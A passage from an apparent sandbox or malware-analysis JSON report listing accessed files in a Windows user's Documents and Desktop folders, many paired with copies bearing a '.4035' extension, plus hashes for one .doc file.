"c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\uh0motmwnhm5qslzdvd.pptx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\YT_fj.xls.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\yt_fj.xls.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\YT_fj.xls", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\yt_fj.xls", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\ZLfwPJ6yOGMDVqlfby.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zlfwpj6yogmdvqlfby.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\ZLfwPJ6yOGMDVqlfby.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zlfwpj6yogmdvqlfby.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\ZUZT.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zuzt.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\ZUZT.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zuzt.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Zwzadzoagi.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zwzadzoagi.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Zwzadzoagi.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zwzadzoagi.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\-nbcCfzcdJQ2dV.doc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\-nbccfzcdjq2dv.doc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\-nbcCfzcdJQ2dV.doc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\-nbccfzcdjq2dv.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\6iTDz.odt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\6itdz.odt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\6iTDz.odt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\6itdz.odt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\9sLzlMyOCFuH.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\9slzlmyocfuh.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\9sLzlMyOCFuH.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\9slzlmyocfuh.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\DF4IZiIv.pdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\df4iziiv.pdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\DF4IZiIv.pdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\df4iziiv.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\DMOsRy5Ljk1e.pps.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\dmosry5ljk1e.pps.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\DMOsRy5Ljk1e.pps", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\dmosry5ljk1e.pps", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\FwX_09l7qc-etEisqd.pdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\fwx_09l7qc-eteisqd.pdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\FwX_09l7qc-etEisqd.pdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\fwx_09l7qc-eteisqd.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\nJPRm.rtf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\njprm.rtf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\nJPRm.rtf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\njprm.rtf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\nnLb8RrQDHzYuf.ots.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\nnlb8rrqdhzyuf.ots.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\nnLb8RrQDHzYuf.ots", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\nnlb8rrqdhzyuf.ots", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\y8GsAYdXEKW3KVw.xls.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\y8gsaydxekw3kvw.xls.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\y8GsAYdXEKW3KVw.xls", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\y8gsaydxekw3kvw.xls", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\_lUS5mT.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\_lus5mt.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\_cbDdOfFkXKNKHz\\_lUS5mT.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\_lus5mt.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\4pMiQOPz.docx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\4pmiqopz.docx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\4pMiQOPz.docx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\4pmiqopz.docx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\9h2Uw8T.rtf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\9h2uw8t.rtf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\9h2Uw8T.rtf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\9h2uw8t.rtf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\BdJci4eewA.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\bdjci4eewa.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\BdJci4eewA.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\bdjci4eewa.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\DD1sMMlGPoF6yRDJyx9.ots.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\dd1smmlgpof6yrdjyx9.ots.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\DD1sMMlGPoF6yRDJyx9.ots", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\dd1smmlgpof6yrdjyx9.ots", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\e5i9jnq7jdi.doc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\e5i9jnq7jdi.doc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\e5i9jnq7jdi.doc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\e5i9jnq7jdi.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\kZfCP7 _wOFu.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\kzfcp7 _wofu.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\kZfCP7 _wOFu.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\kzfcp7 _wofu.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\LbzcMZQLnz3pq.doc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\lbzcmzqlnz3pq.doc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\LbzcMZQLnz3pq.doc", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\lbzcmzqlnz3pq.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\lp4J8.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\lp4j8.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\lp4J8.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\lp4j8.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\mOLcdbxRsE.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\molcdbxrse.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\mOLcdbxRsE.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\molcdbxrse.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\N5xQKlDg2wkPmIcJRs.ppt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\n5xqkldg2wkpmicjrs.ppt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\N5xQKlDg2wkPmIcJRs.ppt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\n5xqkldg2wkpmicjrs.ppt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\Rdvc-2Q3oAz99.ots.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\rdvc-2q3oaz99.ots.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\Rdvc-2Q3oAz99.ots", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\rdvc-2q3oaz99.ots", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\sMAa1L-IqK.ppt.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\smaa1l-iqk.ppt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\zExpZ8SANMxx\\sMAa1L-IqK.ppt", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\smaa1l-iqk.ppt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Outlook Files\\jvueuh@djeu.com.pst.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\outlook files\\jvueuh@djeu.com.pst.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\Outlook Files\\jvueuh@djeu.com.pst", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\outlook files\\jvueuh@djeu.com.pst", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\_private\\folder.ico.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\_private\\folder.ico.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Documents\\My Shapes\\_private\\folder.ico", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\_private\\folder.ico", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\-lci4LWlsWG.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\-lci4lwlswg.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\-lci4LWlsWG.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\-lci4lwlswg.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\1yykkWcOcMO1F.odp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\1yykkwcocmo1f.odp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\1yykkWcOcMO1F.odp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\1yykkwcocmo1f.odp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\69234490.doc.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\69234490.doc.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\69234490.doc", "hashes": [ { "md5_hash": "5975014ccde7296da4989a01e1471e92", "sha1_hash": "499a74573cf6aaa8e79c05d1b6d59dbbfb7402e1", "sha256_hash": "fec85bce338245403956637218c76db743748306c89f7ee7830af65ad17f62db", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\69234490.doc", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\8uQGY6g-zZe55.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\8uqgy6g-zze55.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\8uQGY6g-zZe55.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\8uqgy6g-zze55.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\cgtxGTbWp T.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\cgtxgtbwp t.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\cgtxGTbWp T.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\cgtxgtbwp t.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\CUp25E2.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\cup25e2.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\CUp25E2.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\cup25e2.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\desktop.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\desktop.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\desktop.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\E80xfN6BEp.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\e80xfn6bep.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\E80xfN6BEp.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\e80xfn6bep.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\fwmoz.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\fwmoz.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\fwmoz.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\fwmoz.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\GnTW32T.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\gntw32t.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\GnTW32T.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\gntw32t.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\GvX_LajpHYJjfM.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\gvx_lajphyjjfm.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\GvX_LajpHYJjfM.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\gvx_lajphyjjfm.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\HdUfR3zPYGx.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\hdufr3zpygx.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\HdUfR3zPYGx.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\hdufr3zpygx.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\igCOsJDRZ4j2G1IZw.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\igcosjdrz4j2g1izw.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\igCOsJDRZ4j2G1IZw.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\igcosjdrz4j2g1izw.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\jgRzkhn.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\jgrzkhn.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\jgRzkhn.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\jgrzkhn.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\L9PmyHtkERxj.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\l9pmyhtkerxj.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\L9PmyHtkERxj.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\l9pmyhtkerxj.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\NKSXW.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\nksxw.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\NKSXW.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\nksxw.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\Nyr8aiKjyEFl.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\nyr8aikjyefl.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\Desktop\\Nyr8aiKjyEFl.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 